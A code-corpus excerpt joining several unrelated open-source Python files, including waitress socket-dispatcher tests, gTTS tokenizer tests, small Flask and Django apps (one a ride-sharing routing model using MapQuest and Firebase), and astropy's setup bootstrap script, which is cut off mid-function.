disp = DummyDispatcher()
map = {0:disp}
try:
from waitress import wasyncore
old_select = wasyncore.select
wasyncore.select = dummy_select
self.assertRaises(select.error, self._callFUT, map=map)
finally:
wasyncore.select = old_select
self.assertEqual(pollster.polled, [0.0])
class Test_dispatcher(unittest.TestCase):
def _makeOne(self, sock=None, map=None):
from waitress.wasyncore import dispatcher
return dispatcher(sock=sock, map=map)
def test_unexpected_getpeername_exc(self):
sock = dummysocket()
def getpeername():
raise socket.error(errno.EBADF)
map = {}
sock.getpeername = getpeername
self.assertRaises(socket.error, self._makeOne, sock=sock, map=map)
self.assertEqual(map, {})
def test___repr__accepting(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
inst.accepting = True
inst.addr = ('localhost', 8080)
result = repr(inst)
expected = '<waitress.wasyncore.dispatcher listening localhost:8080 at'
self.assertEqual(result[:len(expected)], expected)
def test___repr__connected(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
inst.accepting = False
inst.connected = True
inst.addr = ('localhost', 8080)
result = repr(inst)
expected = '<waitress.wasyncore.dispatcher connected localhost:8080 at'
self.assertEqual(result[:len(expected)], expected)
def test_set_reuse_addr_with_socketerror(self):
sock = dummysocket()
map = {}
def setsockopt(*arg, **kw):
sock.errored = True
raise socket.error
sock.setsockopt = setsockopt
sock.getsockopt = lambda *arg: 0
inst = self._makeOne(sock=sock, map=map)
inst.set_reuse_addr()
self.assertTrue(sock.errored)
def test_connect_raise_socket_error(self):
sock = dummysocket()
map = {}
sock.connect_ex = lambda *arg: 1
inst = self._makeOne(sock=sock, map=map)
self.assertRaises(socket.error, inst.connect, 0)
def test_accept_raise_TypeError(self):
sock = dummysocket()
map = {}
def accept(*arg, **kw):
raise TypeError
sock.accept = accept
inst = self._makeOne(sock=sock, map=map)
result = inst.accept()
self.assertEqual(result, None)
def test_accept_raise_unexpected_socketerror(self):
sock = dummysocket()
map = {}
def accept(*arg, **kw):
raise socket.error(122)
sock.accept = accept
inst = self._makeOne(sock=sock, map=map)
self.assertRaises(socket.error, inst.accept)
def test_send_raise_EWOULDBLOCK(self):
sock = dummysocket()
map = {}
def send(*arg, **kw):
raise socket.error(errno.EWOULDBLOCK)
sock.send = send
inst = self._makeOne(sock=sock, map=map)
result = inst.send('a')
self.assertEqual(result, 0)
def test_send_raise_unexpected_socketerror(self):
sock = dummysocket()
map = {}
def send(*arg, **kw):
raise socket.error(122)
sock.send = send
inst = self._makeOne(sock=sock, map=map)
self.assertRaises(socket.error, inst.send, 'a')
def test_recv_raises_disconnect(self):
sock = dummysocket()
map = {}
def recv(*arg, **kw):
raise socket.error(errno.ECONNRESET)
def handle_close():
inst.close_handled = True
sock.recv = recv
inst = self._makeOne(sock=sock, map=map)
inst.handle_close = handle_close
result = inst.recv(1)
self.assertEqual(result, b'')
self.assertTrue(inst.close_handled)
def test_close_raises_unknown_socket_error(self):
sock = dummysocket()
map = {}
def close():
raise socket.error(122)
sock.close = close
inst = self._makeOne(sock=sock, map=map)
inst.del_channel = lambda: None
self.assertRaises(socket.error, inst.close)
def test_handle_read_event_not_accepting_not_connected_connecting(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
def handle_connect_event():
inst.connect_event_handled = True
def handle_read():
inst.read_handled = True
inst.handle_connect_event = handle_connect_event
inst.handle_read = handle_read
inst.accepting = False
inst.connected = False
inst.connecting = True
inst.handle_read_event()
self.assertTrue(inst.connect_event_handled)
self.assertTrue(inst.read_handled)
def test_handle_connect_event_getsockopt_returns_error(self):
sock = dummysocket()
sock.getsockopt = lambda *arg: 122
map = {}
inst = self._makeOne(sock=sock, map=map)
self.assertRaises(socket.error, inst.handle_connect_event)
def test_handle_expt_event_getsockopt_returns_error(self):
sock = dummysocket()
sock.getsockopt = lambda *arg: 122
map = {}
inst = self._makeOne(sock=sock, map=map)
def handle_close():
inst.close_handled = True
inst.handle_close = handle_close
inst.handle_expt_event()
self.assertTrue(inst.close_handled)
def test_handle_write_event_while_accepting(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
inst.accepting = True
result = inst.handle_write_event()
self.assertEqual(result, None)
def test_handle_error_gardenpath(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
def handle_close():
inst.close_handled = True
def compact_traceback(*arg, **kw):
return None, None, None, None
def log_info(self, *arg):
inst.logged_info = arg
inst.handle_close = handle_close
inst.compact_traceback = compact_traceback
inst.log_info = log_info
inst.handle_error()
self.assertTrue(inst.close_handled)
self.assertEqual(inst.logged_info, ('error',))
def test_handle_close(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
def log_info(self, *arg):
inst.logged_info = arg
def close():
inst._closed = True
inst.log_info = log_info
inst.close = close
inst.handle_close()
self.assertTrue(inst._closed)
def test_handle_accepted(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
inst.handle_accepted(sock, '1')
self.assertTrue(sock.closed)
class Test_dispatcher_with_send(unittest.TestCase):
def _makeOne(self, sock=None, map=None):
from waitress.wasyncore import dispatcher_with_send
return dispatcher_with_send(sock=sock, map=map)
def test_writable(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
inst.out_buffer = b'123'
inst.connected = True
self.assertTrue(inst.writable())
class Test_close_all(unittest.TestCase):
def _callFUT(self, map=None, ignore_all=False):
from waitress.wasyncore import close_all
return close_all(map, ignore_all)
def test_socketerror_on_close_ebadf(self):
disp = DummyDispatcher(exc=socket.error(errno.EBADF))
map = {0:disp}
self._callFUT(map)
self.assertEqual(map, {})
def test_socketerror_on_close_non_ebadf(self):
disp = DummyDispatcher(exc=socket.error(errno.EAGAIN))
map = {0:disp}
self.assertRaises(socket.error, self._callFUT, map)
def test_reraised_exc_on_close(self):
disp = DummyDispatcher(exc=KeyboardInterrupt)
map = {0:disp}
self.assertRaises(KeyboardInterrupt, self._callFUT, map)
def test_unknown_exc_on_close(self):
disp = DummyDispatcher(exc=RuntimeError)
map = {0:disp}
self.assertRaises(RuntimeError, self._callFUT, map)
class DummyDispatcher(object):
read_event_handled = False
write_event_handled = False
expt_event_handled = False
error_handled = False
close_handled = False
accepting = False
def __init__(self, exc=None):
self.exc = exc
def handle_read_event(self):
self.read_event_handled = True
if self.exc is not None:
raise self.exc
def handle_write_event(self):
self.write_event_handled = True
if self.exc is not None:
raise self.exc
def handle_expt_event(self):
self.expt_event_handled = True
if self.exc is not None:
raise self.exc
def handle_error(self):
self.error_handled = True
def handle_close(self):
self.close_handled = True
def readable(self):
return False
def writable(self):
return False
def close(self):
if self.exc is not None:
raise self.exc
class DummyTime(object):
def __init__(self):
self.sleepvals = []
def sleep(self, val):
self.sleepvals.append(val)
class DummySelect(object):
error = select.error
def __init__(self, exc=None, pollster=None):
self.selected = []
self.pollster = pollster
self.exc = exc
def select(self, *arg):
self.selected.append(arg)
if self.exc is not None:
raise self.exc
def poll(self):
return self.pollster
class DummyPollster(object):
def __init__(self, exc=None):
self.polled = []
self.exc = exc
def poll(self, timeout):
self.polled.append(timeout)
if self.exc is not None:
raise self.exc
else: # pragma: no cover
return []
|
ianastewart/cwltc-admin
|
venv/Lib/site-packages/waitress/tests/test_wasyncore.py
|
Python
|
mit
| 54,410
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from flask import Flask
from flask.ext.migrate import Migrate, MigrateCommand
from flask.ext.script import Manager
from flask_user import UserManager, SQLAlchemyAdapter
from flask_ripozo import FlaskDispatcher
from .models import db, User
from .resources import UserResource, ResourceResource, RelationshipResource
import click
def create_app(config=None):
app = Flask('rest_builder')
app.config.from_pyfile(config)
manager = Manager(app)
migrate = setup_db(app=app, manager=manager)
register_resources(app)
db_adapter = SQLAlchemyAdapter(db, User)
user_manager = UserManager(db_adapter, app)
return app, migrate, manager
def setup_db(app=None, manager=None):
if app:
db.init_app(app)
migrate = Migrate(app=app, db=db)
if manager:
manager.add_command('db', MigrateCommand)
return migrate
def register_resources(app):
dispatcher = FlaskDispatcher(app, url_prefix='/api')
dispatcher.register_resources(UserResource, RelationshipResource, ResourceResource)
@click.command()
def run_app():
app = create_app(config='default_config.py')
app.run(debug=True)
if __name__ == '__main__':
run_app()
|
timmartin19/browser-REST-builder
|
rest_builder/app.py
|
Python
|
mit
| 1,334
|
import time
import datetime
import threading
from django.apps import AppConfig
from django_eventstream import send_event
class TimeappConfig(AppConfig):
name = 'timeapp'
def ready(self):
ensure_worker_started()
worker_started = False
def ensure_worker_started():
global worker_started
if worker_started:
return
if not is_db_ready():
return
worker_started = True
thread = threading.Thread(target=send_worker)
thread.daemon = True
thread.start()
def send_worker():
while True:
data = datetime.datetime.utcnow().isoformat()
send_event('time', 'message', data)
time.sleep(1)
def is_db_ready():
from django.db import DatabaseError
from django_eventstream.models import Event
try:
# see if db tables are present
Event.objects.count()
return True
except DatabaseError:
return False
|
fanout/django-eventstream
|
examples/time/timeapp/apps.py
|
Python
|
mit
| 926
|
# -*- coding: utf-8 -*-
import unittest
import re
from gtts.tokenizer.core import RegexBuilder, PreProcessorRegex, PreProcessorSub, Tokenizer
# Tests based on classes usage examples
# See class documentation for details
class TestRegexBuilder(unittest.TestCase):
def test_regexbuilder(self):
rb = RegexBuilder('abc', lambda x: "{}".format(x))
self.assertEqual(rb.regex, re.compile('a|b|c'))
class TestPreProcessorRegex(unittest.TestCase):
def test_preprocessorregex(self):
pp = PreProcessorRegex('ab', lambda x: "{}".format(x), 'c')
self.assertEqual(len(pp.regexes), 2)
self.assertEqual(pp.regexes[0].pattern, 'a')
self.assertEqual(pp.regexes[1].pattern, 'b')
class TestPreProcessorSub(unittest.TestCase):
def test_proprocessorsub(self):
sub_pairs = [('Mac', 'PC'), ('Firefox', 'Chrome')]
pp = PreProcessorSub(sub_pairs)
_in = "I use firefox on my mac"
_out = "I use Chrome on my PC"
self.assertEqual(pp.run(_in), _out)
class TestTokenizer(unittest.TestCase):
# tokenizer case 1
def case1(self):
return re.compile(r"\,")
# tokenizer case 2
def case2(self):
return RegexBuilder('abc', lambda x: r"{}\.".format(x)).regex
def test_tokenizer(self):
t = Tokenizer([self.case1, self.case2])
_in = "Hello, my name is Linda a. Call me Lin, b. I'm your friend"
_out = [
'Hello',
' my name is Linda ',
' Call me Lin',
' ',
" I'm your friend"]
self.assertEqual(t.run(_in), _out)
def test_bad_params_not_list(self):
# original exception: TypeError
with self.assertRaises(TypeError):
Tokenizer(self.case1)
def test_bad_params_not_callable(self):
# original exception: TypeError
with self.assertRaises(TypeError):
Tokenizer([100])
def test_bad_params_not_callable_returning_regex(self):
# original exception: AttributeError
def not_regex():
return 1
with self.assertRaises(TypeError):
Tokenizer([not_regex])
if __name__ == '__main__':
unittest.main()
|
pndurette/gTTS
|
gtts/tokenizer/tests/test_core.py
|
Python
|
mit
| 2,202
|
import json
import requests
from core.models import Client, Driver
from core.serializers import ClientSerializer
from django.conf import settings
from django.db import models
from django.utils import timezone
from pyfcm import FCMNotification
PUSH_SERVICE = FCMNotification(api_key=settings.FIREBASE_DRIVER_KEY)
class Ride(models.Model):
created_on = models.DateTimeField(auto_now_add=True)
active = models.BooleanField(default=False)
pickup_latitude = models.FloatField()
pickup_longitude = models.FloatField()
drop_latitude = models.FloatField()
drop_longitude = models.FloatField()
client = models.ForeignKey(Client, related_name='rides')
request_received_at = models.DateTimeField(null=True, blank=True)
request_processed_at = models.DateTimeField(null=True, blank=True)
initial_eta = models.FloatField(null=True, blank=True)
pickup_at = models.DateTimeField(null=True, blank=True)
drop_at = models.DateTimeField(null=True, blank=True)
serviced_by = models.ForeignKey(Driver, related_name='rides', null=True, blank=True)
deleted = models.BooleanField(default=True)
def __unicode__(self):
return "%s - %s" % (self.client, self.created_on)
class DriverLocation(models.Model):
driver = models.ForeignKey(Driver, related_name="location")
latitude = models.FloatField()
longitude = models.FloatField()
timestamp = models.DateTimeField()
latest = models.BooleanField(default=False)
def __unicode__(self):
return "%s %s" % (self.driver, self.timestamp.strftime("%H:%M:%S"))
def dijkstra(matrix, m=None, n=None):
m = n = len(matrix)
k = 0
cost = [[0 for x in range(m)] for x in range(1)]
offsets = [k]
elepos = 0
for j in range(m):
cost[0][j] = matrix[k][j]
mini = 999
for x in range(m - 1):
mini = 999
for j in range(m):
if cost[0][j] <= mini and j not in offsets:
mini = cost[0][j]
elepos = j
offsets.append(elepos)
for j in range(m):
if cost[0][j] > cost[0][elepos] + matrix[elepos][j]:
cost[0][j] = cost[0][elepos] + matrix[elepos][j]
return offsets, cost[0]
def calculate_route(client_id=None):
mapquest_url = "https://www.mapquestapi.com/directions/v2/routematrix?key=%s" % settings.MAPQUEST_KEY
request_body = {
"options": {
"allToAll": True
}
}
locations = []
current_driver_location = DriverLocation.objects.filter(latest=True).order_by("-timestamp")
current_driver_location = current_driver_location[0]
locations.append({
"latLng": {
"lat": current_driver_location.latitude,
"lng": current_driver_location.longitude,
},
"user": "Driver",
"custom_type": "start"
})
for location in Ride.objects.filter(active=True, deleted=False).order_by("request_received_at")[:8]:
if location.serviced_by:
locations.append({
"latLng": {
"lat": location.drop_latitude,
"lng": location.drop_longitude
},
"user": ClientSerializer(location.client).data,
"custom_type": "drop",
"ride_id": location.pk,
"request_time": location.request_received_at.strftime("%s"),
"pickup_at": location.pickup_at.strftime("%s")
})
else:
locations.append({
"latLng": {
"lat": location.pickup_latitude,
"lng": location.pickup_longitude
},
"user": ClientSerializer(location.client).data,
"custom_type": "pick",
"ride_id": location.pk,
"request_time": location.request_received_at.strftime("%s"),
"pickup_at": None
})
location.request_processed_at = timezone.now()
request_body['locations'] = locations
if len(locations) > 0:
response = requests.post(mapquest_url, data=json.dumps(request_body))
if response.status_code == 200:
try:
time_matrix = json.loads(response.content)['time']
except:
return None, None
path = [i for i in range(0, len(time_matrix))]
cost_matrix = time_matrix[0]
# path, cost_matrix = dijkstra(time_matrix)
eta = 0
path_in_co_ordinates = [{
"latLng": locations[0]['latLng'],
"user": "driver",
"eta": eta
}]
for index in range(1, len(path)):
eta += cost_matrix[index]
path_in_co_ordinates.append({
"latLng": locations[path[index]]['latLng'],
"user": locations[path[index]]['user'],
"type": locations[path[index]]['custom_type'],
"eta": eta,
"ride_id": locations[path[index]]['ride_id'],
"request_time": locations[path[index]]['request_time'],
"pickup_at": locations[path[index]]['pickup_at']
})
if client_id:
eta_for_client = 0
for i in range(1, len(path_in_co_ordinates)):
if path_in_co_ordinates[i]["user"]["id"] == client_id:
eta_for_client = path_in_co_ordinates[i]["eta"]
if current_driver_location.driver.push_notification_token:
result = PUSH_SERVICE.notify_single_device(
registration_id=current_driver_location.driver.push_notification_token,
data_message={"path": path_in_co_ordinates}, message_body={"path": path_in_co_ordinates})
return path_in_co_ordinates, eta_for_client
return path_in_co_ordinates
else:
print "error"
else:
return None
|
cmpe-295/project-backend
|
safe_ride/ride/models.py
|
Python
|
mit
| 6,027
|
def ninja_io(args):
"""Return the inputs/outputs as a single string
Args:
args (str | list): a string or list of strings
Returns:
a string
"""
if isinstance(args, list):
return " ".join(list(map(str, args)))
else:
return str(args)
|
yuhangwang/ninjag-python
|
ninjag/core/ninja_io.py
|
Python
|
mit
| 288
|
"""
This bootstrap module contains code for ensuring that the astropy_helpers
package will be importable by the time the setup.py script runs. It also
includes some workarounds to ensure that a recent-enough version of setuptools
is being used for the installation.
This module should be the first thing imported in the setup.py of distributions
that make use of the utilities in astropy_helpers. If the distribution ships
with its own copy of astropy_helpers, this module will first attempt to import
from the shipped copy. However, it will also check PyPI to see if there are
any bug-fix releases on top of the current version that may be useful to get
past platform-specific bugs that have been fixed. When running setup.py, use
the ``--offline`` command-line option to disable the auto-upgrade checks.
When this module is imported or otherwise executed it automatically calls a
main function that attempts to read the project's setup.cfg file, which it
checks for a configuration section called ``[ah_bootstrap]`` the presences of
that section, and options therein, determine the next step taken: If it
contains an option called ``auto_use`` with a value of ``True``, it will
automatically call the main function of this module called
`use_astropy_helpers` (see that function's docstring for full details).
Otherwise no further action is taken and by default the system-installed version
of astropy-helpers will be used (however, ``ah_bootstrap.use_astropy_helpers``
may be called manually from within the setup.py script).
This behavior can also be controlled using the ``--auto-use`` and
``--no-auto-use`` command-line flags. For clarity, an alias for
``--no-auto-use`` is ``--use-system-astropy-helpers``, and we recommend using
the latter if needed.
Additional options in the ``[ah_boostrap]`` section of setup.cfg have the same
names as the arguments to `use_astropy_helpers`, and can be used to configure
the bootstrap script when ``auto_use = True``.
See https://github.com/astropy/astropy-helpers for more details, and for the
latest version of this module.
"""
import contextlib
import errno
import imp
import io
import locale
import os
import re
import subprocess as sp
import sys
try:
from ConfigParser import ConfigParser, RawConfigParser
except ImportError:
from configparser import ConfigParser, RawConfigParser
if sys.version_info[0] < 3:
_str_types = (str, unicode)
_text_type = unicode
PY3 = False
else:
_str_types = (str, bytes)
_text_type = str
PY3 = True
# What follows are several import statements meant to deal with install-time
# issues with either missing or misbehaving pacakges (including making sure
# setuptools itself is installed):
# Some pre-setuptools checks to ensure that either distribute or setuptools >=
# 0.7 is used (over pre-distribute setuptools) if it is available on the path;
# otherwise the latest setuptools will be downloaded and bootstrapped with
# ``ez_setup.py``. This used to be included in a separate file called
# setuptools_bootstrap.py; but it was combined into ah_bootstrap.py
try:
import pkg_resources
_setuptools_req = pkg_resources.Requirement.parse('setuptools>=0.7')
# This may raise a DistributionNotFound in which case no version of
# setuptools or distribute is properly installed
_setuptools = pkg_resources.get_distribution('setuptools')
if _setuptools not in _setuptools_req:
# Older version of setuptools; check if we have distribute; again if
# this results in DistributionNotFound we want to give up
_distribute = pkg_resources.get_distribution('distribute')
if _setuptools != _distribute:
# It's possible on some pathological systems to have an old version
# of setuptools and distribute on sys.path simultaneously; make
# sure distribute is the one that's used
sys.path.insert(1, _distribute.location)
_distribute.activate()
imp.reload(pkg_resources)
except:
# There are several types of exceptions that can occur here; if all else
# fails bootstrap and use the bootstrapped version
from ez_setup import use_setuptools
use_setuptools()
# typing as a dependency for 1.6.1+ Sphinx causes issues when imported after
# initializing submodule with ah_boostrap.py
# See discussion and references in
# https://github.com/astropy/astropy-helpers/issues/302
try:
import typing # noqa
except ImportError:
pass
# Note: The following import is required as a workaround to
# https://github.com/astropy/astropy-helpers/issues/89; if we don't import this
# module now, it will get cleaned up after `run_setup` is called, but that will
# later cause the TemporaryDirectory class defined in it to stop working when
# used later on by setuptools
try:
import setuptools.py31compat # noqa
except ImportError:
pass
# matplotlib can cause problems if it is imported from within a call of
# run_setup(), because in some circumstances it will try to write to the user's
# home directory, resulting in a SandboxViolation. See
# https://github.com/matplotlib/matplotlib/pull/4165
# Making sure matplotlib, if it is available, is imported early in the setup
# process can mitigate this (note importing matplotlib.pyplot has the same
# issue)
try:
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot
except:
# Ignore if this fails for *any* reason*
pass
# End compatibility imports...
# In case it didn't successfully import before the ez_setup checks
import pkg_resources
from setuptools import Distribution
from setuptools.package_index import PackageIndex
from distutils import log
from distutils.debug import DEBUG
# TODO: Maybe enable checking for a specific version of astropy_helpers?
DIST_NAME = 'astropy-helpers'
PACKAGE_NAME = 'astropy_helpers'
if PY3:
UPPER_VERSION_EXCLUSIVE = None
else:
UPPER_VERSION_EXCLUSIVE = '3'
# Defaults for other options
DOWNLOAD_IF_NEEDED = True
INDEX_URL = 'https://pypi.python.org/simple'
USE_GIT = True
OFFLINE = False
AUTO_UPGRADE = True
# A list of all the configuration options and their required types
CFG_OPTIONS = [
('auto_use', bool), ('path', str), ('download_if_needed', bool),
('index_url', str), ('use_git', bool), ('offline', bool),
('auto_upgrade', bool)
]
class _Bootstrapper(object):
"""
Bootstrapper implementation. See ``use_astropy_helpers`` for parameter
documentation.
"""
def __init__(self, path=None, index_url=None, use_git=None, offline=None,
download_if_needed=None, auto_upgrade=None):
if path is None:
path = PACKAGE_NAME
if not (isinstance(path, _str_types) or path is False):
raise TypeError('path must be a string or False')
if PY3 and not isinstance(path, _text_type):
fs_encoding = sys.getfilesystemencoding()
path = path.decode(fs_encoding) # path to unicode
self.path = path
# Set other option attributes, using defaults where necessary
self.index_url = index_url if index_url is not None else INDEX_URL
self.offline = offline if offline is not None else OFFLINE
# If offline=True, override download and auto-upgrade
if self.offline:
download_if_needed = False
auto_upgrade = False
self.download = (download_if_needed
if download_if_needed is not None
else DOWNLOAD_IF_NEEDED)
self.auto_upgrade = (auto_upgrade
if auto_upgrade is not None else AUTO_UPGRADE)
# If this is a release then the .git directory will not exist so we
# should not use git.
git_dir_exists = os.path.exists(os.path.join(os.path.dirname(__file__), '.git'))
if use_git is None and not git_dir_exists:
use_git = False
self.use_git = use_git if use_git is not None else USE_GIT
# Declared as False by default--later we check if astropy-helpers can be
# upgraded from PyPI, but only if not using a source distribution (as in
# the case of import from a git submodule)
self.is_submodule = False
@classmethod
def main(cls, argv=None):
if argv is None:
argv = sys.argv
config = cls.parse_config()
config.update(cls.parse_command_line(argv))
auto_use = config.pop('auto_use', False)
bootstrapper = cls(**config)
if auto_use:
# Run the bootstrapper, otherwise the setup.py is using the old
# use_astropy_helpers() interface, in which case it will run the
# bootstrapper manually after reconfiguring it.
bootstrapper.run()
return bootstrapper
@classmethod
def parse_config(cls):
if not os.path.exists('setup.cfg'):
return {}
cfg = ConfigParser()
try:
cfg.read('setup.cfg')
except Exception as e:
if DEBUG:
raise
log.error(
"Error reading setup.cfg: {0!r}\n{1} will not be "
"automatically bootstrapped and package installation may fail."
"\n{2}".format(e, PACKAGE_NAME, _err_help_msg))
return {}
if not cfg.has_section('ah_bootstrap'):
return {}
config = {}
for option, type_ in CFG_OPTIONS:
if not cfg.has_option('ah_bootstrap', option):
continue
if type_ is bool:
value = cfg.getboolean('ah_bootstrap', option)
else:
value = cfg.get('ah_bootstrap', option)
config[option] = value
return config
@classmethod
def parse_command_line(cls, argv=None):
if argv is None:
argv = sys.argv
config = {}
# For now we just pop recognized ah_bootstrap options out of the
# arg list. This is imperfect; in the unlikely case that a setup.py
# custom command or even custom Distribution class defines an argument
# of the same name then we will break that. However there's a catch22
# here that we can't just do full argument parsing right here, because
# we don't yet know *how* to parse all possible command-line arguments.
if '--no-git' in argv:
config['use_git'] = False
argv.remove('--no-git')
if '--offline' in argv:
config['offline'] = True
argv.remove('--offline')
if '--auto-use' in argv:
config['auto_use'] = True
argv.remove('--auto-use')
if '--no-auto-use' in argv:
config['auto_use'] = False
argv.remove('--no-auto-use')
if '--use-system-astropy-helpers' in argv:
config['auto_use'] = False
argv.remove('--use-system-astropy-helpers')
return config
def run(self):
strategies = ['local_directory', 'local_file', 'index']
dist = None
# First, remove any previously imported versions of astropy_helpers;
# this is necessary for nested installs where one package's installer
# is installing another package via setuptools.sandbox.run_setup, as in
# the case of setup_requires
for key in list(sys.modules):
try:
if key == PACKAGE_NAME or key.startswith(PACKAGE_NAME + '.'):
del sys.modules[key]
except AttributeError:
# Sometimes mysterious non-string things can turn up in
# sys.modules
continue
# Check to see if the path is a submodule
self.is_submodule = self._check_submodule()
for strategy in strategies:
method = getattr(self, 'get_{0}_dist'.format(strategy))
dist = method()
if dist is not None:
break
else:
raise _AHBootstrapSystemExit(
"No source found for the {0!r} package; {0} must be "
"available and importable as a prerequisite to building "
"or installing this package.".format(PACKAGE_NAME))
# This is a bit hacky, but if astropy_helpers was loaded from a
# directory/submodule its Distribution object gets a "precedence" of
# "DEVELOP_DIST". However, in other cases it gets a precedence of
# "EGG_DIST". However, when activing the distribution it will only be
# placed early on sys.path if it is treated as an EGG_DIST, so always
# do that
dist = dist.clone(precedence=pkg_resources.EGG_DIST)
# Otherwise we found a version of astropy-helpers, so we're done
# Just active the found distribution on sys.path--if we did a
# download this usually happens automatically but it doesn't hurt to
# do it again
# Note: Adding the dist to the global working set also activates it
# (makes it importable on sys.path) by default.
try:
pkg_resources.working_set.add(dist, replace=True)
except TypeError:
# Some (much) older versions of setuptools do not have the
# replace=True option here. These versions are old enough that all
# bets may be off anyways, but it's easy enough to work around just
# in case...
if dist.key in pkg_resources.working_set.by_key:
del pkg_resources.working_set.by_key[dist.key]
pkg_resources.working_set.add(dist)
@property
def config(self):
"""
A `dict` containing the options this `_Bootstrapper` was configured
with.
"""
return dict((optname, getattr(self, optname))
for optname, _ in CFG_OPTIONS if hasattr(self, optname))
def get_local_directory_dist(self):
"""
Handle importing a vendored package from a subdirectory of the source
distribution.
"""
if not os.path.isdir(self.path):
return
log.info('Attempting to import astropy_helpers from {0} {1!r}'.format(
'submodule' if self.is_submodule else 'directory',
self.path))
dist = self._directory_import()
if dist is None:
log.warn(
'The requested path {0!r} for importing {1} does not '
'exist, or does not contain a copy of the {1} '
'package.'.format(self.path, PACKAGE_NAME))
elif self.auto_upgrade and not self.is_submodule:
# A version of astropy-helpers was found on the available path, but
# check to see if a bugfix release is available on PyPI
upgrade = self._do_upgrade(dist)
if upgrade is not None:
dist = upgrade
return dist
def get_local_file_dist(self):
"""
Handle importing from a source archive; this also uses setup_requires
but points easy_install directly to the source archive.
"""
if not os.path.isfile(self.path):
return
log.info('Attempting to unpack and import astropy_helpers from '
'{0!r}'.format(self.path))
try:
dist = self._do_download(find_links=[self.path])
except Exception as e:
if DEBUG:
raise
log.warn(
'Failed to import {0} from the specified archive {1!r}: '
'{2}'.format(PACKAGE_NAME, self.path, str(e)))
dist = None
if dist is not None and self.auto_upgrade:
# A version of astropy-helpers was found on the available path, but
# check to see if a bugfix release is available on PyPI
upgrade = self._do_upgrade(dist)
if upgrade is not None:
dist = upgrade
return dist
def get_index_dist(self):
if not self.download:
log.warn('Downloading {0!r} disabled.'.format(DIST_NAME))
return None
log.warn(
"Downloading {0!r}; run setup.py with the --offline option to "
"force offline installation.".format(DIST_NAME))
try:
dist = self._do_download()
except Exception as e:
if DEBUG:
raise
log.warn(
'Failed to download and/or install {0!r} from {1!r}:\n'
'{2}'.format(DIST_NAME, self.index_url, str(e)))
dist = None
# No need to run auto-upgrade here since we've already presumably
# gotten the most up-to-date version from the package index
return dist
def _directory_import(self):
"""
Import astropy_helpers from the given path, which will be added to
sys.path.
Must return True if the import succeeded, and False otherwise.
"""
# Return True on success, False on failure but download is allowed, and
# otherwise raise SystemExit
path = os.path.abspath(self.path)
# Use an empty WorkingSet rather than the man
# pkg_resources.working_set, since on older versions of setuptools this
# will invoke a VersionConflict when trying to install an upgrade
ws = pkg_resources.WorkingSet([])
ws.add_entry(path)
dist = ws.by_key.get(DIST_NAME)
if dist is None:
# We didn't find an egg-info/dist-info in the given path, but if a
# setup.py exists we can generate it
setup_py = os.path.join(path, 'setup.py')
if os.path.isfile(setup_py):
# We use subprocess instead of run_setup from setuptools to
# avoid segmentation faults - see the following for more details:
# https://github.com/cython/cython/issues/2104
sp.check_output([sys.executable, 'setup.py', 'egg_info'], cwd=path)
for dist in pkg_resources.find_distributions(path, True):
# There should be only one...
return dist
return dist
def _do_download(self, version='', find_links=None):
if find_links:
allow_hosts = ''
index_url = None
else:
allow_hosts = None
index_url = self.index_url
# Annoyingly, setuptools will not handle other arguments to
# Distribution (such as options) before handling setup_requires, so it
# is not straightforward to programmatically augment the arguments which
# are passed to easy_install
class _Distribution(Distribution):
def get_option_dict(self, command_name):
opts = Distribution.get_option_dict(self, command_name)
if command_name == 'easy_install':
if find_links is not None:
opts['find_links'] = ('setup script', find_links)
if index_url is not None:
opts['index_url'] = ('setup script', index_url)
if allow_hosts is not None:
opts['allow_hosts'] = ('setup script', allow_hosts)
return opts
if version:
req = '{0}=={1}'.format(DIST_NAME, version)
else:
if UPPER_VERSION_EXCLUSIVE is None:
req = DIST_NAME
else:
req = '{0}<{1}'.format(DIST_NAME, UPPER_VERSION_EXCLUSIVE)
attrs = {'setup_requires': [req]}
# NOTE: we need to parse the config file (e.g. setup.cfg) to make sure
# it honours the options set in the [easy_install] section, and we need
# to explicitly fetch the requirement eggs as setup_requires does not
# get honored in recent versions of setuptools:
# https://github.com/pypa/setuptools/issues/1273
try:
context = _verbose if DEBUG else _silence
with context():
dist = _Distribution(attrs=attrs)
try:
dist.parse_config_files(ignore_option_errors=True)
dist.fetch_build_eggs(req)
except TypeError:
# On older versions of setuptools, ignore_option_errors
# doesn't exist, and the above two lines are not needed
# so we can just continue
pass
# If the setup_requires succeeded it will have added the new dist to
# the main working_set
return pkg_resources.working_set.by_key.get(DIST_NAME)
except Exception as e:
if DEBUG:
raise
msg = 'Error retrieving {0} from {1}:\n{2}'
if find_links:
source = find_links[0]
elif index_url != INDEX_URL:
source = index_url
else:
source = 'PyPI'
raise Exception(msg.format(DIST_NAME, source, repr(e)))
def _do_upgrade(self, dist):
# Build up a requirement for a higher bugfix release but a lower minor
# release (so API compatibility is guaranteed)
next_version = _next_version(dist.parsed_version)
req = pkg_resources.Requirement.parse(
'{0}>{1},<{2}'.format(DIST_NAME, dist.version, next_version))
package_index = PackageIndex(index_url=self.index_url)
upgrade = package_index.obtain(req)
if upgrade is not None:
return self._do_download(version=upgrade.version)
def _check_submodule(self):
"""
Check if the given path is a git submodule.
See the docstrings for ``_check_submodule_using_git`` and
``_check_submodule_no_git`` for further details.
"""
if (self.path is None or
(os.path.exists(self.path) and not os.path.isdir(self.path))):
return False
if self.use_git:
return self._check_submodule_using_git()
else:
return self._check_submodule_no_git()
def _check_submodule_using_git(self):
"""
Check if the given path is a git submodule. If so, attempt to initialize
and/or update the submodule if needed.
This function makes calls to the ``git`` command in subprocesses. The
``_check_submodule_no_git`` option uses pure Python to check if the given
path looks like a git submodule, but it cannot perform updates.
"""
cmd = ['git', 'submodule', 'status', '--', self.path]
try:
log.info('Running `{0}`; use the --no-git option to disable git '
'commands'.format(' '.join(cmd)))
returncode, stdout, stderr = run_cmd(cmd)
